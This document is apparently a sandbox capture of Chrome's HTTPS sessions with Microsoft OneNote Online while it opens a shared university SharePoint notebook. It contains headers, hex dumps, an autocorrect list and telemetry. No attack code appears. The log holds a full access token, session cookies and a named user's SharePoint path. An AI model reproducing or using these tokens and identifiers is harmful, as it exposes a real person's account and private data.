                                                2022-10-03 13:38:24 UTC452INData Raw: 6f 72 65 22 2c 22 6d 73 6f 5f 74 65 6c 6c 4d 65 53 65 72 76 69 63 65 22 2c 22 65 78 63 65 6c 5f 69 6e 73 65 72 74 4f 6e 6c 69 6e 65 50 69 63 74 75 72 65 73 22 2c 22 70 70 74 5f 69 6e 73 65 72 74 4f 6e 6c 69 6e 65 50 69 63 74 75 72 65 73 22 2c 22 77 6f 72 64 5f 69 6e 73 65 72 74 4f 6e 6c 69 6e 65 50 69 63 74 75 72 65 73 22 2c 22 76 69 73 69 6f 5f 69 6e 73 65 72 74 4f 6e 6c 69 6e 65 50 69 63 74 75 72 65 73 22 2c 22 6d 73 6f 5f 69 6e 73 65 72 74 4d 6f 62 69 6c 65 44 65 76 69 63 65 50 69 63 74 75 72 65 73 22 2c 22 6d 73 6f 5f 73 6d 61 72 74 4c 6f 6f 6b 75 70 22 2c 22 77 6f 72 64 5f 6c 69 6e 6b 65 64 49 6e 52 65 73 75 6d 65 41 73 73 69 73 74 61 6e 74 22 2c 22 70 70 74 5f 69 6e 73 65 72 74 4f 6e 6c 69 6e 65 56 69 64 65 6f 73 22 2c 22 77 6f 72 64 5f 73 69 6d 69
                                                Data Ascii: ore","mso_tellMeService","excel_insertOnlinePictures","ppt_insertOnlinePictures","word_insertOnlinePictures","visio_insertOnlinePictures","mso_insertMobileDevicePictures","mso_smartLookup","word_linkedInResumeAssistant","ppt_insertOnlineVideos","word_simi


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                22192.168.2.34979013.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:24 UTC430OUTGET /o/App_Scripts/Acl/Acl1033.js HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1
                                                2022-10-03 13:38:24 UTC431INHTTP/1.1 200 OK
                                                Cache-Control: public,max-age=31536000
                                                Content-Length: 19181
                                                Content-Type: application/javascript
                                                Last-Modified: Wed, 14 Sep 2022 02:57:01 GMT
                                                Accept-Ranges: bytes
                                                ETag: "e69de7a9e5c7d81:0"
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 6854ffbb-a73e-426d-a4c3-f044b6e736aa
                                                X-UserSessionId: 6854ffbb-a73e-426d-a4c3-f044b6e736aa
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: PA1PEPF00035E90
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU4
                                                X-OFFICEFD: PA1PEPF00035E90
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wordslice_control,afd_visioslice_control,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: F7C83FC44C2749E48D8C8E458356F875 Ref B: AMS231032602049 Ref C: 2022-10-03T13:38:24Z
                                                Date: Mon, 03 Oct 2022 13:38:24 GMT
                                                Connection: close
                                                2022-10-03 13:38:24 UTC432INData Raw: ef bb bf 76 61 72 20 41 75 74 6f 43 6f 72 72 65 63 74 4c 69 73 74 3d 7b 22 28 63 29 22 3a 22 c2 a9 22 2c 22 28 72 29 22 3a 22 c2 ae 22 2c 22 28 74 6d 29 22 3a 22 e2 84 a2 22 2c 22 2e 2e 2e 22 3a 22 e2 80 a6 22 2c 22 61 62 62 6f 75 74 22 3a 22 61 62 6f 75 74 22 2c 22 61 62 6f 74 75 22 3a 22 61 62 6f 75 74 22 2c 22 61 62 6f 75 74 61 22 3a 22 61 62 6f 75 74 20 61 22 2c 22 61 62 6f 75 74 69 74 22 3a 22 61 62 6f 75 74 20 69 74 22 2c 22 61 62 6f 75 74 74 68 65 22 3a 22 61 62 6f 75 74 20 74 68 65 22 2c 22 61 62 73 63 65 6e 63 65 22 3a 22 61 62 73 65 6e 63 65 22 2c 22 61 63 63 65 73 6f 72 69 65 73 22 3a 22 61 63 63 65 73 73 6f 72 69 65 73 22 2c 22 61 63 63 69 64 61 6e 74 22 3a 22 61 63 63 69 64 65 6e 74 22 2c 22 61 63 63 6f 6d 6f 64 61 74 65 22 3a 22 61 63 63 6f
                                                Data Ascii: var AutoCorrectList={"(c)":"","(r)":"","(tm)":"","...":"","abbout":"about","abotu":"about","abouta":"about a","aboutit":"about it","aboutthe":"about the","abscence":"absence","accesories":"accessories","accidant":"accident","accomodate":"acco
                                                2022-10-03 13:38:24 UTC436INData Raw: 73 22 2c 22 63 6f 6d 70 61 69 72 22 3a 22 63 6f 6d 70 61 72 65 22 2c 22 63 6f 6d 70 61 6e 79 3b 73 22 3a 22 63 6f 6d 70 61 6e 79 e2 80 99 73 22 2c 22 63 6f 6d 70 6c 65 61 74 65 64 22 3a 22 63 6f 6d 70 6c 65 74 65 64 22 2c 22 63 6f 6d 70 6c 65 61 74 6c 79 22 3a 22 63 6f 6d 70 6c 65 74 65 6c 79 22 2c 22 63 6f 6d 70 6c 65 61 74 6e 65 73 73 22 3a 22 63 6f 6d 70 6c 65 74 65 6e 65 73 73 22 2c 22 63 6f 6d 70 6c 65 74 6c 79 22 3a 22 63 6f 6d 70 6c 65 74 65 6c 79 22 2c 22 63 6f 6d 70 6c 65 74 6e 65 73 73 22 3a 22 63 6f 6d 70 6c 65 74 65 6e 65 73 73 22 2c 22 63 6f 6d 70 6f 73 61 74 65 22 3a 22 63 6f 6d 70 6f 73 69 74 65 22 2c 22 63 6f 6d 74 61 69 6e 22 3a 22 63 6f 6e 74 61 69 6e 22 2c 22 63 6f 6d 74 61 69 6e 73 22 3a 22 63 6f 6e 74 61 69 6e 73 22 2c 22 63 6f 6d 75
                                                Data Ascii: s","compair":"compare","company;s":"companys","compleated":"completed","compleatly":"completely","compleatness":"completeness","completly":"completely","completness":"completeness","composate":"composite","comtain":"contain","comtains":"contains","comu
                                                2022-10-03 13:38:24 UTC444INData Raw: 70 6f 72 74 75 6e 69 74 69 65 73 22 2c 22 6f 70 70 6f 74 75 6e 69 74 79 22 3a 22 6f 70 70 6f 72 74 75 6e 69 74 79 22 2c 22 6f 72 67 69 6e 69 7a 61 74 69 6f 6e 22 3a 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6f 72 67 69 6e 69 7a 65 64 22 3a 22 6f 72 67 61 6e 69 7a 65 64 22 2c 22 6f 74 65 68 72 22 3a 22 6f 74 68 65 72 22 2c 22 6f 74 75 22 3a 22 6f 75 74 22 2c 22 6f 75 74 6f 66 22 3a 22 6f 75 74 20 6f 66 22 2c 22 6f 76 65 72 74 68 65 22 3a 22 6f 76 65 72 20 74 68 65 22 2c 22 6f 77 72 6b 22 3a 22 77 6f 72 6b 22 2c 22 6f 77 75 6c 64 22 3a 22 77 6f 75 6c 64 22 2c 22 6f 78 69 64 65 6e 74 22 3a 22 6f 78 69 64 61 6e 74 22 2c 22 70 61 70 61 65 72 22 3a 22 70 61 70 65 72 22 2c 22 70 61 72 6c 69 6d 65 6e 74 22 3a 22 70 61 72 6c 69 61 6d 65 6e 74 22 2c 22 70 61
                                                Data Ascii: portunities","oppotunity":"opportunity","orginization":"organization","orginized":"organized","otehr":"other","otu":"out","outof":"out of","overthe":"over the","owrk":"work","owuld":"would","oxident":"oxidant","papaer":"paper","parliment":"parliament","pa
                                                2022-10-03 13:38:24 UTC447INData Raw: 66 69 63 69 65 6e 74 22 2c 22 73 75 70 6f 73 65 64 22 3a 22 73 75 70 70 6f 73 65 64 22 2c 22 73 75 70 70 6f 73 73 65 64 22 3a 22 73 75 70 70 6f 73 65 64 22 2c 22 73 75 70 72 69 73 65 22 3a 22 73 75 72 70 72 69 73 65 22 2c 22 73 75 70 72 69 73 65 64 22 3a 22 73 75 72 70 72 69 73 65 64 22 2c 22 73 77 69 6d 69 6e 67 22 3a 22 73 77 69 6d 6d 69 6e 67 22 2c 22 74 61 68 6e 22 3a 22 74 68 61 6e 22 2c 22 74 61 68 74 22 3a 22 74 68 61 74 22 2c 22 74 61 6c 65 6b 64 22 3a 22 74 61 6c 6b 65 64 22 2c 22 74 61 6c 6b 69 67 6e 22 3a 22 74 61 6c 6b 69 6e 67 22 2c 22 74 61 74 68 22 3a 22 74 68 61 74 22 2c 22 74 65 63 6e 69 63 61 6c 22 3a 22 74 65 63 68 6e 69 63 61 6c 22 2c 22 74 65 68 22 3a 22 74 68 65 22 2c 22 74 65 68 79 22 3a 22 74 68 65 79 22 2c 22 74 65 6c 6c 74 20 68
                                                Data Ascii: ficient","suposed":"supposed","suppossed":"supposed","suprise":"surprise","suprised":"surprised","swiming":"swimming","tahn":"than","taht":"that","talekd":"talked","talkign":"talking","tath":"that","tecnical":"technical","teh":"the","tehy":"they","tellt h


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                23192.168.2.34979713.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:25 UTC452OUTPOST /o/RemoteUls.ashx?build=16.0.15707.41015&waccluster=GEU2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 15379
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-AccessTokenTtl: 1664840296804
                                                X-Requested-With: XMLHttpRequest
                                                X-xhr: 1
                                                sec-ch-ua-platform: "Windows"
                                                haep: 1
                                                X-AccessToken: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9.eyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0.EWb66LDcPK9or86SYiXEnS8X85go_GF6jrytmNe-VM0DP1xedkdH8-P7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O_cBiZszwxDu1rJtgjSTldsdPBQi-x4isn_tXs1kVY3k0U38ib-UTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe_YJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                X-UserType: WOPI
                                                X-IsCoauthSession: true
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1; WacUPToggleState=%7B%22CCS%22%3A0%7D; GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca
                                                2022-10-03 13:38:25 UTC455OUTData Raw: 7b 22 54 22 3a 31 36 36 34 38 33 36 37 30 33 33 35 33 2c 22 4c 22 3a 5b 7b 22 47 22 3a 35 31 34 30 31 38 30 32 2c 22 54 22 3a 33 2c 22 4d 22 3a 22 52 65 73 70 6f 6e 73 65 20 72 65 61 64 79 20 66 6f 72 20 68 74 74 70 73 3a 2f 2f 6f 66 66 69 63 65 63 6c 69 65 6e 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 63 6f 6e 66 69 67 31 36 3f 66 6c 69 67 68 74 73 3d 43 6c 69 65 6e 74 2e 52 65 73 6f 75 72 63 65 53 65 72 76 69 63 65 34 48 69 64 64 65 6e 56 32 26 73 65 72 76 69 63 65 73 3d 52 65 73 6f 75 72 63 65 53 65 72 76 69 63 65 45 6e 64 70 6f 69 6e 74 32 22 2c 22 43 22 3a 33 32 34 2c 22 44 22 3a 35 30 7d 2c 7b 22 47 22 3a 34 32 35 37 30 32 38 2c 22 54 22 3a 34 2c 22 4d 22 3a 22 53 74 6f 70 77 61 74 63 68 20 73 74 6f 70 70 65 64 3a 20 7b 5c 22 4f 70 65 72 61 74
                                                Data Ascii: {"T":1664836703353,"L":[{"G":51401802,"T":3,"M":"Response ready for https://officeclient.microsoft.com/config16?flights=Client.ResourceService4HiddenV2&services=ResourceServiceEndpoint2","C":324,"D":50},{"G":4257028,"T":4,"M":"Stopwatch stopped: {\"Operat
                                                2022-10-03 13:38:25 UTC470INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 0f72a128-65c3-42c4-b63a-5ad83e2820f2
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000094C1
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000094C1
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wordcapacity_2_control,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 4C310D70FB7546AF8E9ADAC931FA8164 Ref B: AMS231032604023 Ref C: 2022-10-03T13:38:25Z
                                                Date: Mon, 03 Oct 2022 13:38:25 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                24192.168.2.34980213.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:32 UTC472OUTGET /o/OneNoteS2SHandler.ashx?action=eduproperties&notebookid=1-5C627324-B4E6-4967-A31A-5C2E2767A2A0&isteacher=false&isstudent=false&WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9%2EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0%2EEWb66LDcPK9or86SYiXEnS8X85go%5FGF6jrytmNe%2DVM0DP1xedkdH8%2DP7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O%5FcBiZszwxDu1rJtgjSTldsdPBQi%2Dx4isn%5FtXs1kVY3k0U38ib%2DUTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe%5FYJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ&access_token_ttl=1664840296804 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                X-Requested-With: XMLHttpRequest
                                                X-xhr: 1
                                                sec-ch-ua-platform: "Windows"
                                                haep: 1
                                                OrgIdSiteUrl: https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                X-UserType: WOPI
                                                X-IsCoauthSession: true
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1; WacUPToggleState=%7B%22CCS%22%3A0%7D; GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca
                                                2022-10-03 13:38:33 UTC475INHTTP/1.1 500 Internal Server Error
                                                Cache-Control: no-cache, no-store
                                                Pragma: no-cache
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html
                                                Expires: -1
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: ac659c14-e4df-4682-be05-0e6e96bf2af8
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000094C3
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000094C3
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: A9BCDFEEB27045C0889280AE94006046 Ref B: AMS231032609027 Ref C: 2022-10-03T13:38:32Z
                                                Date: Mon, 03 Oct 2022 13:38:32 GMT
                                                Connection: close
                                                2022-10-03 13:38:33 UTC476INData Raw: 34 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 35 30 30 20
                                                Data Ascii: 4b8<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>500
                                                2022-10-03 13:38:33 UTC477INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                25192.168.2.34980813.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:33 UTC477OUTPOST /o/RemoteTelemetry.ashx?usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&build=16.0.15707.41015 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 11080
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Content-Type: text/plain;charset=UTF-8
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
